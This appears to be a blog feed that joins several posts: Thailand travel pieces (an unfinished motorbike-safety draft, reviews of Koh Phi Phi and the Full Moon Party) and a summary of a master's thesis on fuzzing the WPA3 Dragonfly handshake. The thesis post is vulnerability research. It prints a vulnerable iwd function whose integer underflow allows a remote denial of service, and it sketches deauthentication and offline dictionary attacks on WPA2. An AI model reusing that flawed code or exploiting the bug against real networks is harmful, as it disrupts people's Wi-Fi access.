<p>What follows are five crucial tips how to survive riding a motorbike in Thailand.</p>
<ol>
<li>Wear a fucking helmet</li>
</ol>
<p>Statistics speak a clear language. When you drive long enough on Thailand's roads, you will be involved in an accident. It goes without a saying, if you do not wear a helmet, your probability to die or to suffer from a serious injury is much higher compared to wearing a proper helmet.</p>
<p>I saw so many tourist that did not wear a helmet. It's a fucking mystery to me why. I didn't study so many years in university to get my head crushed on a Thai road. Furthermore, wearing an (open face) helmet is not even a discomfort.</p>
<p>Always wear a fucking helmet. Even better, chose a proper helmet. There are <a href="https://www.fortamoto.com/motorcycle-helmets/helmet-types/">different types of helmets</a>. So if you have a choice, always go for the <strong>full face helmet</strong>. In most cases, the motorbike rental places will only offer <strong>open face helmets</strong>, which offer reduced protection. However, each helmet is better than no one.</p>
<ol>
<li>Ride predictable</li>
</ol>
<p>This does not mean that you should drive slow. Sometimes it's best to drive in a predictable, conformist fashion.</p>
<p>In my experience, most Thai motorcyclists do not drive very fast. They usually ride not faster than 40 km/h and at the very edge of the road.</p>
<ol>
<li>When you are a beginner, do not take one bike for two people.</li>
</ol>
<p>This might be counter intuitive.</p>
<ol>
<li>Be aware of sand and dirt in curves and pot holes on roads</li>
</ol>
<p>5.</p>
<h3>References</h3>
<p>https://mythailand.blog/2019/06/11/driving-a-scooter-in-thailand/</p>4 reasons why you should NOT travel to Koh Phi Phi2019-10-22T19:04:00+02:002019-10-22T19:04:00+02:00Nikolai Tschachertag:incolumitas.com,2019-10-22:/2019/10/22/4-reasons-why-you-should-not-travel-to-koh-phi-phi/<p>In this quick blog post I outline why you probably don't want to go to Koh Phi Phi.</p><p>Koh Phi Phi and Koh Samui are two infamous Thai islands that I was aware of before I set my foot on Thailand. Honestly, I didn't bother reading blog posts or reviews about the island before I decided to travel from Krabi Town to Koh Phi Phi by the public ferry. The famous name <strong>Koh Phi Phi</strong> was reason enough to give it a try. In hindsight, I wish I had informed myself, because <strong>I cannot recommend visiting this place at all</strong>.</p>
<p>What follows are four reasons why you probably should not include Koh Phi Phi as a destination in your journey.</p>
<h2>1. Koh Phi Phi is polluted and the beaches are dirty</h2>
<p>Koh Phi Phi has a notorious waste problem. The very first thing every unsuspecting visitor is commanded to do after arriving on the island, is to spend 20 baht towards a common fund that goes to a waste disposal company that is supposed to get rid of the trash that quickly accumulates on the island.</p>
<p>However, it seems that the company doesn't do a perfect job. There is trash to be seen everywhere on the island. It would be too far stretched to speak of <strong>trash island</strong>, but Koh Phi Phi definitely has a problem with waste on the beach and illegal waste dumps in the nature. The pictures below unfortunately prove my point:</p>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/trash/yellow-plastic.jpg" alt="yellow trash" style="width: 100%" />
<figcaption>Yellow plastic bag in the water on the Koh Phi Phi beach.</figcaption>
</figure>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/trash/trash-dumped.jpg" alt="trash" style="width: 100%" />
<figcaption>Trash dumped into the nature around Tonsai Bay on Koh Phi Phi.</figcaption>
</figure>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/trash/waste-beach.jpg" alt="waste on the beach" style="width: 100%" />
<figcaption>Random waste dumped on the beach of Koh Phi Phi island.</figcaption>
</figure>
<h2>2. Koh Phi Phi is heavily overcrowded and way too touristy</h2>
<p>The small sand strip of the island where you actually are allowed to freely move is packed with thousands of shops that sell unnecessary stuff. Countless tourists from all over the world stay in the many hundreds of hotels and resorts on the small sand strip named Tonsai Bay. In the evening, there is a horrific party with comically bad and way too loud music with young people drinking their expensive buckets.</p>
<p>The very first thing you see when you arrive on the island is a Burger King and Mac Donald's. It requires a significant effort in evilness to plant those fast food chains directly on the arriving peer.</p>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/fast-food.jpg" alt="fast food restaurants" style="width: 100%" />
<figcaption>Fast food chains on Koh Phi Phi.</figcaption>
</figure>
<p>When you walk through the narrow streets on Koh Phi Phi, you have countless of opportunities to waste your money. The vendors constantly harass you and try to alleviate you from the heavy burden that your money seems to pose.</p>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/shops.jpg" alt="lots of shops in koh phi phi" style="width: 100%" />
<figcaption>Endless shops that are selling unnecessary stuff.</figcaption>
</figure>
<h2>3. You are imprisoned in Tonsai Bay</h2>
<p>Koh Phi Phi consists of two mountainous parts which are connected by a roughly 1km long flat sand bank. This sand bank named Tonsai Bay harbors almost all hostels and hotels from the island. There is no real possibility to discover the large other parts of the island. There are no trails or paths that lead to the hilly and rain-forested area of the island.</p>
<p>Put differently, there is no realistic way to flee the heavily populated main town of the island - other than by paying an expensive taxi long-tail boat.</p>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/tonsai-bay.jpg" alt="Tonsai Bai" style="width: 100%" />
<figcaption>Overview of Tonsai Bay from the Viewpoint (that costs 30 baht)</figcaption>
</figure>
<p>For instance, in order to visit <em>Monkey Beach</em>, the taxi boats charges between 600 and 700 baht for two persons, which equals roughly 12$ per person. This boat drive costs way too much. In comparison, the price to go from Ao Nang Beach to Railay Beach in Krabi costs you only 100 baht, while both tours are more or less the same distance.</p>
<p>Therefore, if you are not willed to pay a large fee to visit all the other small islands around Tonsai Bay, you are <strong>basically imprisoned</strong> on Koh Phi Phi. It wouldn't have been straightforward to create a trail into the hilly Koh Phi Phi island, but it certainly isn't impossible. But then, there wouldn't be a way to overcharge the tourists so effortlessly. So there's that. Don't visit Koh Phi Phi if you are not willed to pay large amounts of money for transportation by water.</p>
<h2>4. Everything is too expensive on Koh Phi phi</h2>
<p>I do understand that Koh Phi Phi must be more expensive compared to the main land and that there is no way to realistically change this, but if you are traveling on a low budget, you should definitely not go to Koh Phi Phi. It's not worth the money. For example, a 1.5l bottle of water costs 28 baht in Tonsai bay compared to a 18 baht on the main land.</p>
<p>Accommodation is nearly double the price compared to other islands. Ko Tao is roughly the same size as Koh Phi Phi, but has way more moderate prices. We were lucky that we visited the island in the off-season, otherwise we would have needed to continue our trip on a diet of bread and water and without accommodation.</p>
<h2>The good things on Koh Phi Phi</h2>
<p>Let's try to be not so negative for once.</p>
<p>Of course Koh Phi Phi is still a beautiful island after all. For example, the sunset from the view point is definitely worth to have experienced.</p>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/sunset.jpg" alt="Sunset in Koh Phi Phi" style="width: 100%" />
<figcaption>Sunset seen from the Viewpoint on Koh Phi Phi</figcaption>
</figure>
<p>The very best thing on Koh Phi Phi is an abundance of cats that live on the island. Almost any Thai family owns a cat and they are treated very well. I petted around 20 cats during my one and a half day on the island and it was worth every single pet.</p>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/cat1.jpg" alt="Cat in Koh Phi Phi" style="width: 100%" />
<figcaption>Adorable cat eyes</figcaption>
</figure>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/cats.jpg" alt="More Cats" style="width: 100%" />
<figcaption>Two beautiful cats chilling on Koh Phi Phi</figcaption>
</figure>
<p>Furthermore, on a more personal note, I met a lot of friendly and amazing people on the island. The Thai inhabitants are relaxed and always friendly and helpful. We met a french couple that was traveling since years. They were extremely likable and I realized then and there how traveling can transform you into a better version of yourself.</p>Model Based fuzzing of the WPA3 Dragonfly Handshake2019-10-19T17:18:00+02:002019-10-19T17:18:00+02:00Nikolai Tschachertag:incolumitas.com,2019-10-19:/2019/10/19/model-based-fuzzing-of-the-WPA3-dragonfly-handshake/<p>The results of my Master thesis named <em>Model based fuzzing of the WPA3 Dragonfly handshake</em> will be quickly discussed in this blog post. No severe vulnerabilities were discovered, mostly due to the limited deployment of WPA3 hardware since it's introduction. However, a DoS vulnerability in <code>iwd</code> was found.</p><p>Here is a quick link to <a href="https://incolumitas.com/data/dragonfly-fuzzing-wpa3.pdf"><strong>download my Master Thesis about fuzzing the WPA3 handshake</strong></a>.</p>
<p>In the past couple of months, I completed my Master thesis at <a href="https://www.hu-berlin.de/en/">Humboldt University</a> and thus finalized my computer science degree.</p>
<p>The aim of this scientific thesis was to find a suitable approach to systematically fuzz the new WPA3 Dragonfly handshake that is plugged in front of the quite old WPA 4-Way handshake. The research yielded different fuzzing policies and I learned a lot about systematically fuzzing complex software projects.</p>
<h3>Why do we even require a third WPA version?</h3>
<p>The purpose of the now 15 year old 4-way handshake of WPA and WPA2 is to establish a so called Pairwise Transient Key (PTK) that is used to decrypt all traffic between the client (supplicant) and authenticator (access point). With WPA-PSK (pre-shared key), commonly a password that both the supplicant (for example your mobile phone) and the authenticator (the router that sits in your apartment) possess, is used to derive the PTK in a sequence of 4 EAPOL key frames.</p>
<p>This old 4 way handshake is still reasonably secure when used with high entropy passwords. However, we human beings tend to use easy guessable low entropy passwords such as <em>baconbacon</em>, which is the WiFi password that my hostel uses in Krabi/Thailand from where I am writing this blog post.</p>
<p>The classic 4-way handshake is susceptible to offline dictionary attacks. Furthermore, since deauthentication frames are not encrypted and can easily be spoofed (which means that you can pretend to be a network participant who you are not), it is possible to deauthenticate a client from the access point, observe the network and wait until the client reconnects with the access point and capture and record the key material that is exchanged.</p>
<p>With this collected key exchange material it is feasible to launch a offline dictionary attack against the password. In practice, this means you upload a highly optimized cracking program to the AWS cloud and pay a couple of hundred dollars to enumerate all wordlist passwords, some rainbow tables and probably all combinations of lowercase alphanumeric strings up to 8 characters.</p>
<p>With WPA3, this offline dictionary attack and deauthentiation attack are no longer feasible.</p>
<figure>
<img src="https://incolumitas.com/images/dragon_overview.png" alt="Dragonfly Overview" style="width: 100%" />
<figcaption>The complete model of the WPA3-SAE handshake, including announcing beacons frames, probe request and probe response frames, association request frames and the finalizing 4-way handshake.
</figcaption>
</figure>
<h5>Security Properties of Dragonfly</h5>
<p>This new Simultaneous Authentication of Equals handshake (another name for the Dragonfly handshake), which was originally standardized in 2011, adds two security properties to Wi-Fi’s original 4-way handshake:</p>
<ol>
<li><strong>Forward secrecy</strong>. Attackers cannot decrypt traffic with old keys, because the negotiated keys are updated in every new instance of the handshake.</li>
<li><strong>Offline dictionary attack resistance</strong>. Attackers can merely launch online
attacks against the handshake. Put differently, the number of guesses from a
brute force attack grows linearly with the number of authentication attempts,
which can easily be regulated by the authenticator.</li>
</ol>
<p>Put differently, the Dragonfly handshake is a so called <strong>PAKE</strong> scheme that enforces the two participants to make an <em>online</em> guess at the password. Online in this context means that it's impossible to capture viable key material in order to crack it offline. PAKE stands for Password Authentiated Key Exchange and one important property of PAKE schemes is that they are capable of securely exchanging a key, while simultaneously being authenticated.</p>
<p>It's the same principle as with the well-known Diffie-Hellman key exchange, except that the exchange is authenticated, which means that only two parties that share a common key are able to exchange a key.</p>
<figure>
<img src="https://incolumitas.com/images/handshake_dragonfly.png" alt="Dragonfly Handshake" style="width: 100%" />
<figcaption>High-level overview of the SAE commit and confirm handshake.
</figcaption>
</figure>
<p>Therefore, the sole purpose of the Dragonfly key exchange is to take the PSK as input, somehow construct a common base element in a discrete logarithmic group (such as elliptic curves or multiplicative groups modulo a prime <em>p</em>). The plaintext password (PSK) and some large random numbers are used as ingredients to derive the common base element in order to establish an high entropy commonly shared key <strong>PMK</strong> that is used as an input to the old 4-way handshake.</p>
<p>Because the random numbers change in every iteration of the Dragonfly protocol, the PMK is unique for each new instance of the handshake. Now, it's easy to see why an offline dictionary attack is unfeasible and why forward secrecy is guaranteed.</p>
<p>Why did the inventor of Dragonfly - Dan Harkins - not simply use an existing PAKE protocol? The reason were licensing issues with the original <a href="https://en.wikipedia.org/wiki/SPEKE">SPEKE</a> protocol.</p>
<h3>What is fuzzing?</h3>
<p>Fuzzing is a testing strategy whose intention is to uncover security vulnerabilities in the software under test. It is the process of <em>repeatedly running a program with generated inputs that may be syntactically or semantically malformed</em>.</p>
<p>A possible definition of fuzzing as Valentin at al. understands it is <em>the execution of the program under test using inputs sampled from an input space that protrudes the expected input space of the program under test</em>.</p>
<p>In my master thesis, I mostly used a <strong>blackbox fuzzing approach</strong> and <strong>greybox fuzzing approach</strong>.</p>
<h5>Blackbox fuzzing</h5>
<p>In blackbox fuzzing, the logic and internal behavior of the fuzzed program is largely unknown. A blackbox fuzzer merely observes the input/output behavior of the program under test, thus treating the targeted software as blackbox.</p>
<p>An example for black-box fuzzing test is the generation of a large corpus of fuzzed jpeg files and uploading them to an arbitrary web jpeg compression service and observing if the service crashes in an unexpected way, typically revealed by 500 internal server error responses. Most traditional fuzzers have been blackbox fuzzers.</p>
<h5>Coverage-guided greybox-fuzzing</h5>
<p>Coverage-guided greybox-fuzzing (CGF) uses lightweight binary program instrumentation to trace the code coverage reached by fuzzed input mutations.</p>
<p>Greybox fuzzers typically obtain limited information about the internals and semantics of the program under test, such as performing lightweight static analysis or collecting dynamic information about code coverage by instrumenting the code at compile time.</p>
<p>In order to instrument programs, greybox fuzzing engines inject few code instructions right after every conditional jump. Those code instructions are called trampolines and their purpose is to assign a unique identifier to the current branch and increment a coarse counter belonging to the branch. The counter is implemented as probabilistic data structure such as a count-min sketch or Bloom filter. This instrumentation enables the fuzzer to keep track of what branches are how often executed. The instrumentation is applied at compile-time to the program under evaluation.</p>
<p>When the greybox fuzzing engine learns that a specifically mutated seed input explored previously unknown code paths, it adds the modified seed to an growing seed corpus. In other words, greybox fuzzers leverage coverage feedback information to find new inputs that reach deeper into the program. </p>
<p>CGF does not require manual program analysis, thus being more scalable and parallelizable compared to other whitebox fuzzing strategies. Put differently, CGF fuzzing engines combine
various powerful concepts to yield efficient fuzzing campaigns.</p>
<h3>What results did the WPA3 Dragonfly fuzzing methodology yield?</h3>
<p>Unfortunately, the thesis did not yield similarly spectacular results compared to my <a href="https://incolumitas.com/2016/06/08/typosquatting-package-managers/">Bachelor Thesis</a>. However, I managed to gather some interesting insights and suggestions for further fruitful work:</p>
<figure>
<img src="https://incolumitas.com/images/fuzzing_results.png" alt="Fuzzing Results" style="width: 100%" />
<figcaption>A summary of the fuzzing results obtained from the master thesis.</figcaption>
</figure>
<p>I managed to find a DoS vulnerability in the handling of anti-clogging tokens in the <strong>iwd</strong> intel wireless daemon. The vulnerability can be triggered remotely and it is possible to completely block any supplicant that tries to connect to the BSSID. The vulnerable function is called <code>sae_process_anti_clogging</code> located in the file <code>iwd/src/sae.c</code> in version <code>iwd v0.18</code>.</p>
<p>Ironically, the anti-clogging defense of WPA3-SAE tries to mitigate DoS attacks that arise when an attacker floods the victim with many forged commit frames which invoke a cascade of costly commit frame processing operations such as password element derivation, quadratic residue blinding and the mitigations against side channel attacks and timing attacks themselves.</p>
<div class="highlight"><pre><span></span><code><span class="k">static</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="nf">sae_process_anti_clogging</span><span class="p">(</span><span class="k">struct</span><span class="w"> </span><span class="nc">sae_sm</span><span class="w"> </span><span class="o">*</span><span class="n">sm</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">uint8_t</span><span class="w"> </span><span class="o">*</span><span class="n">ptr</span><span class="p">,</span><span class="w"></span>
<span class="kt">size_t</span><span class="w"> </span><span class="n">len</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="cm">/*</span>
<span class="cm"> * IEEE 802.11-2016 - Section 12.4.6 Anti-clogging tokens</span>
<span class="cm"> *</span>
<span class="cm"> * It is suggested that an Anti-Clogging Token not exceed 256 octets</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">len</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mi">256</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">l_error</span><span class="p">(</span><span class="s">"anti-clogging token size %zu too large, 256 max"</span><span class="p">,</span><span class="w"> </span><span class="n">len</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">sm</span><span class="o">-></span><span class="n">token</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">l_memdup</span><span class="p">(</span><span class="n">ptr</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">2</span><span class="p">,</span><span class="w"> </span><span class="n">len</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">2</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">sm</span><span class="o">-></span><span class="n">token_len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">len</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">2</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">sm</span><span class="o">-></span><span class="n">sync</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>The vulnerability is a signed unsigned integer overflow in the <code>len</code> variable which occurs when the anti clogging frame has a payload of 0 or 1 bytes. Technically, <code>iwd</code> allows to construct such as frame, even though it doesn't make any sense in a real world application, because the anti-clogging token payload should be a high entropy hashed secret that is verified by the issuer. More details <a href="https://incolumitas.com/data/dragonfly-fuzzing-wpa3.pdf">can be found in the thesis</a> in section 6.2.</p>
<ol>
<li>
<p>Furthermore, I created a blackbox fuzzing client that remotely fuzzes any WPA3 capable authenticator. The <a href="https://gitlab.com/NikolaiT/dragonfuzz">link to the source code of dragonfuzz can be found here</a>. </p>
</li>
<li>
<p>Another fuzzer is based on the <a href="https://github.com/jtpereyda/boofuzz">boofuzz framework</a> and <a href="https://github.com/NikolaiT/dragonfuzz">can be found on github</a>.</p>
</li>
<li>
<p>It wasn't straightforward to correctly compile and target the functionality that is responsible for the framing of the WPA3 handshake within <code>hostapd</code>. Hence, <a href="https://github.com/NikolaiT/fuzz_sae_hostap">I also published the instructions how to fuzz hostapd with libFuzzer on Github</a>.</p>
</li>
</ol>
<p>Creating an efficient fuzzing interface for a large software project such as <code>hostapd</code> was a lot of work, so I hope it helps someone.</p>
<p>While running the fuzzer for a couple of minutes, a unsigned integer overflow similar to the one that lead to the DoS above was reported by libFuzzer. However, it didn't have any harmful consequences.</p>
<h3>Limitations of the fuzzing approach</h3>
<p>The SAE handshake consists of only two frames with a total of five possible fields in the Auth-Commit management body (group id, scalar, element, optional anti-clogging token, optional password identifier) and only two possible fields in the Auth-Confirm frame (send confirm number, confirm token). Therefore, the parsing of those two authentication frames has limited complexity and thus the likelihood of programming mistakes in the parsing code is similarly slim. Hence, a solely fuzzing based approach as conducted in this thesis covers a fraction of all existing vulnerability
classes.</p>
<h3>Conclusion</h3>
<p>Writing an efficient fuzzer that targets the WPA3-SAE authentication handshake in the wild is a difficult assignment, because there exists almost no hardware that supports the WPA3-SAE handshake at the time of writing this thesis (August 2019).</p>
<p>Instead a hybrid approach was followed. One method was the in-process, coverage-guided greybox fuzzing of the open source WiFi supplicant <code>iwd</code> and access point implementation <code>hostapd</code> with the fuzzing engine libFuzzer.</p>
<p>Another fuzzing strategy was a remote, over-the-radio blackbox fuzzing of the Synology MR2200ac Router, one of the rare devices that already supports the new WPA3 certification. Remote fuzzing was conducted with a fuzzing framework named Dragonfuzz that was developed during this thesis.</p>
<p>As a concluding statement, the author conjectures that a fuzzing based approach using modern, powerful greybox fuzzing engines such as AFL or libFuzzer is only meaningful, if the target of evaluation is rich in parsing functionality. This is not necessarily the case with WPA-SAE implementations, where parsing is limited to a few fields of static size. The room for logical flaws such as timing attacks or cryptographic implementation mistakes is much larger, as recent research has proven.</p>
<p>A manual security audit that checks for logical vulnerabilities is probably more successful in uncovering security vulnerabilities compared to a automated fuzzing based methodology. However, such a manual review process requires extensive experience from the auditor in various areas of computer security research in order to yield potential results.</p>
<p>Nevertheless, the research conducted in this thesis yielded a harmful DoS vulnerability in the 802.11 supplicant software <code>iwd</code> and thus justifies the chosen methodology.</p>Review of the Koh Phangan Full Moon Party in Octobre 20192019-10-15T14:30:00+02:002019-10-18T18:30:00+02:00Nikolai Tschachertag:incolumitas.com,2019-10-15:/2019/10/15/thailand-koh-phangan-fullmoon-party-octobre-2019/<p>Travel experiences during the days of the full moon party in Koh Phangan. The Jungle Experience Party is a huge scam, the Waterfall Party on Koh Phangan might be even worse.</p><p>This blog post tries to give you an honest impression of my experience
during the full moon party on the Thai island Koh Phangan on 13th and 14th Octobre 2019. In hindsight, I would rate it a 3.5/5. The pre party, <strong>the Jungle Experience Party is utter trash</strong>, the Full Moon Party itself was a quite enjoyable beach party and worth a visit. At the time of writing, I was 28 years old and not the youngest lad anymore, therefore my trip journal must be understood within this context.</p>
<h2>Arrival and Goodtimes Backpackers hostel</h2>
<p>We took the Songserm ferry from Kao Tao to Koh Phangan. The two hour trip was reasonably priced (700 baht for two persons which equals 23USD) and we immediately booked the Goodtime Beach Backpackers hostel close to the landing peer in the city. It's not necessary to take a taxi, the distance can be backpacked in 25 minutes.</p>
<p>It's not difficult to give a positive recommendation for the Goodtimes Backpackers hostel, because the doorms are clean, the beds are more or less comfortable, there is air conditioning in the rooms and the bathrooms are clean. The hostel itself is a party hostel and thus very social. You will encounter mostly young western folks that are looking for an presumably unforgetable Full Moon party night.</p>
<p>The hostel is only 20 meters from the beach and even has an own pool. The large outside area with a ping pong table and pool table creates a perfect nurturing ground for new friendships and travel connections. Therefore, the hostel itself is definitely a good catch if you are somewhat young, extroverted and you are looking to party a bit.</p>
<figure>
<img src="https://incolumitas.com/images/thailand/fmp/goodtimes.jpg" alt="goodtimes backpackers" style="width: 100%" />
<figcaption>The Goodtime Backpackers Hostel is a perfect catch if you are looking to party while also having the possibility to relax.</figcaption>
</figure>
<h2>The day before the full moon party - Jungle Experience Party</h2>
<p>The day before the legendary Full Moon Party on Haadrin Beach starts, the so called Jungle Experience Party is heavily advertised. <strong>Put quickly, do not go there!!!</strong> All in all, the party <strong>is a huge scam</strong>. The entry fee amounts to 700 baht per person, which is the same amount of money you pay when you actually want to go to a well established techno/minimal club in Berlin. </p>
<figure>
<iframe width="560" height="315" src="https://www.youtube.com/embed/0JS-uGxl4BE" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
<figcaption>Heavy rain on the way home after the jungle experience party with an ambulance passing, probably taking some drugged party tourist to the next hospital.</figcaption>
</figure>
<p>Furthermore, most party hostels on the island organize a taxi that takes you to the Jungle Experience Party for which you need to pay an additional 100 baht. One taxi is capable of transporting up to 15 passengers, so the total amount earned accumulates to 1500 baht for a taxi drive that merely takes 5 minutes. Therefore, it's a really good opportuntiy to milk cash from backpackers.</p>
<p>The common climate in the hostel prior to the Jungle Experience Party is a peer-pressured buildup. Honestly, the best part of the Jungle Experience Party is the anticipation to collect good memories and have an unforgetable night. All the hostel staff recommends to visit it, probably because they recieve a large share of the overpriced 700 baht ticket. </p>
<p>The party itself is supposed to be in the Jungle - But there is a asphalt street going directly up to the entrance of the huge commerialized festival area where the party takes place. The staff wrongly stated that there is no road to the Jungle Experience Party and that taking your own motorbike would be dangerous. This is absolutely wrong. You can simply drive your own bike when you plan do not get drunk. At the entrance to the <em>festival area</em>, there is no real jungle to be seen, maybe a couple of palm trees.</p>
<p>Instead, there are many shaks and Thai street-vendors that try to sell you overpriced alcohol and food. There is one stage where some semi interesting techno/house music is played. It's not particularly bad music, but it's not worth paying 700 baht for. The people there are mostly young folks around the age of 18 to 25 years trying to hook up and getting as drunk as humanly possible. They seem to not care about their surroundings that much, because must of them are very intoxicated and too young to know that there exist better parties.</p>
<p>In the late hours during the Jungle Experience, I saw a girl stumbling through the party crowd, unable to keep her balance and orientation. It seemed as if she was drugged with KO pills. Luckily, a friend of her managed to grab her and get her away from the party crowd. Soon after, an ambulance arrived. Stories like that are common and you often hear similar stories in hostels. The most heard advice is not to drink anything that you didn't open yourself and to never leave your eyes from your drink.</p>
<p>When you finally managed to convince yourself to get back to your hostel because it won't get any better, you need to find a taxi. It's not a problem to actually find a taxi, since the whole festival area is full of locals that try to sell you their taxi services, but most of them cost around 500 baht for the 5 kilometer trip back to your hostel. We decided to just walk in order to not pay again the overpriced tourist-tax. After a one hour walk, we finally managed to return to the dorm and get some sleep.</p>
<p>In conclusion, the party was heavily overpriced and not worth at all to attend. The music was mediocre at least. The same probably applies to similar parties - Such as the Waterfall party on Koh Phangan. After talking with a guy from the hostel, he confirmed that the
Waterfall party is even worse than the Jungle Experience Party, because there is not even a Waterfall.</p>
<h2>The Full Moon Party</h2>
<p>Every month during full moon, there is a huge party on the south-east part of Koh Phangan: Haad Rin beach. The location is perfect for a beach party. There is a constant breeze coming from the open sea, such that the hot climate is somewhat neutralized by the wind. The wide beach allows you to find some private space even with thousands of party people dancing on the beach.</p>
<figure>
<img src="https://incolumitas.com/images/thailand/fmp/haadrin_day.jpg" alt="Haadrin on daylight" style="width: 100%" />
<figcaption>The full moon party beach on day with preparations.</figcaption>
</figure>
<p>The music is a mix between techno, dubstep, minimal to hardstyle and mainstream party music. You can just walk to the next stage when you are tired from the music from the current stage. But you can be assured that there is music style for every taste on the wide beach. The overall atmosphere is really positive and welcoming. I haven't encountered a single fight or negative experience. Some guys are pissing into the sea, but this isn't a major problem because the sea is kinda rough with many waves. Some folks are on drugs, but I haven't seen anything too crazy. When heading back to the mainland, two girls in the ferry told us that they were kinda shocked from the full moon party, because they saw a heavily drugged women in the sea, trying to find a <em>spiritual experience</em>. In reality, she was having an psychotic episode and wanted to drown herself in the waves. Therefore dear kids, <strong>do not take drugs whose origin you are unawre of</strong>.</p>
<p>The full moon party isn't anything magical. If you don't plan to attend, you will miss out an experience that you can easily find on any large festival in your home country.</p>
<figure>
<img src="https://incolumitas.com/images/thailand/fmp/haadrin_night.jpg" alt="full moon party" style="width: 100%" />
<figcaption>The full moon party beach by night.</figcaption>
</figure>
<p>The organization is extremly thought-through. You may even buy your own alcohol and food for a cheap price in the many small 7/11 mini supermarkets in Haad Rin city. The entry fee is a meager 100 baht and also 100 baht for the taxi drive from your hostel. I managed to not pay for the hostel taxi from Goodtime Backpackers and my travel mate even arrived with his motorbike, even though he needed to spend 50 baht to park his motorcycle.</p>
<p>In general, I wouldn't recommend to arrive with your motorbike to the party, because there might be police stops that charge you for driving under the influence or for a missing motorcycle drivers license (since most car licenses from Europe do not allow you to drive a scooter larger than 50cm3). Even if you are allowed to drive motorcycles in your country, you will need an international drivings license.</p>
<h2>Conclusion</h2>
<p>The island Koh Phangan is worth a visit during the Full Moon Party. Below are my major recommendations for your stay on this island:</p>
<ol>
<li><strong>Do not go to the Jungle Experience Party that happens before the legit full moon party!!!</strong>. The party is a scam and you kinda get pressured into it by the party hostel environment.</li>
<li>Rent a motorbike and drive around the island. Honestly, driving from beach to beach and cruising around on the steep jungle roads is my favourite experience from this island.</li>
<li>Go to the Full Moon Party and dance a bit, but don't expect to discover something magical and unique. It's just too mainstream and touristy to be special. Nevertheless, it's not a bad investment of your time. You can also go as a couple, it's definitely not a single party folk exclusive trip. I would not buy and consume drugs, since the laws in Thailand are very strict and you never kow what you end up consuming.</li>
</ol>Battling incomplete information: Connect market demand with market supply by Google advertisement scraping and lead crawling2019-09-30T19:42:00+02:002019-09-30T19:42:00+02:00Nikolai Tschachertag:incolumitas.com,2019-09-30:/2019/09/30/connecting-market-demand-and-supply-with-ad-scraping/<p>In this blog post, it is explained how a lack of perfect information about the market allows the clever middleman to connect market supply with market demand by advertisement scrawping and lead crawling.</p><h2>The scenario</h2>
<p>Let's assume Alexandra is a very well connected women in the law industry and is an executive in a large insurance cooperation that consists of hundreds of branches spread all around the United States.</p>
<p>It frequently occurs that clients that have been referred to Alexandra's insurance company require legal counseling to settle various disputes. This referring process is a decision where a lot of money is made (lead). It's common practice that the party that controls the demand (the law company) charges a fee in order to advertise and prioritize certain lawyers and legal professionals to their clients. Therefore, in a way, not the best lawyers are recommended, but the attorneys that bought the right for being referred from the law company.</p>
<p>This is a mechanism that can be found in any industry or economy, where companies control demand and the clients do not have perfect information about the supply. It's a consequence of the inability of individuals to (1) process a large collection of information and (2) lack of perfect information in the first hand.</p>
<p>There exists a myriad of examples where people without proper information are shamelessly ripped of:</p>
<ul>
<li>
<p>As a tourist, you are vulnerable to all kinds of information disadvantages. You pay a tourist price from the taxi drive from the airport to your hotel, you pay an increased price for the hotel itself, because you used sites such as <a href="https://dannymekic.com/201607/no-longer-use-booking-com-shouldnt-either">booking.com to book your accommodation</a>. When you eat in restaurants, you most likely end up paying more than the locals, just because you are a foreigner. The list goes on and on. As a tourist, you are basically viewed as privileged person with lots of disposable income.</p>
</li>
<li>
<p>It's even worse in the housing market. When you are searching an affordable shared flat and you start looking on online platforms, you most likely pay a at least 50% inflated price compared to what you would pay when you knew the landlords in person.</p>
</li>
</ul>
<figure>
<img src="https://www.amchameu.eu/sites/default/files/styles/committee_thumbnail/public/group/digital_economy.jpg" alt="digital economy" style="width: 100%;" />
<figcaption>Incomplete information is the norm in every market (Source: https://www.amchameu.eu/committees-groups/digital-economy) </figcaption>
</figure>
<p>Put differently, for every kind of business where access to information is regulated (which is more or less the case in every industry), you pay a certain fee to an intermediary which connects market demand and market supply. Examples for large Internet intermediaries are <a href="https://www.airbnb.com">AirBnb</a> or <a href="https://tinder.com/">the devilish dating app Tinder</a>. In both cases, the platform makes money by creating the possibility of a transaction. The platform that brings together demand and supply doesn't add any value, it merely attempts to simulate a better market.</p>
<p>Let's jump back to Alexandra and her control over the demand in form of clients that need to be referred to a legal counselor. Of course any client can decide for himself which lawyer he would prefer, but the consulting effect of the law company comes with a certain authority, especially because the patient finds himself in a vulnerable situation.</p>
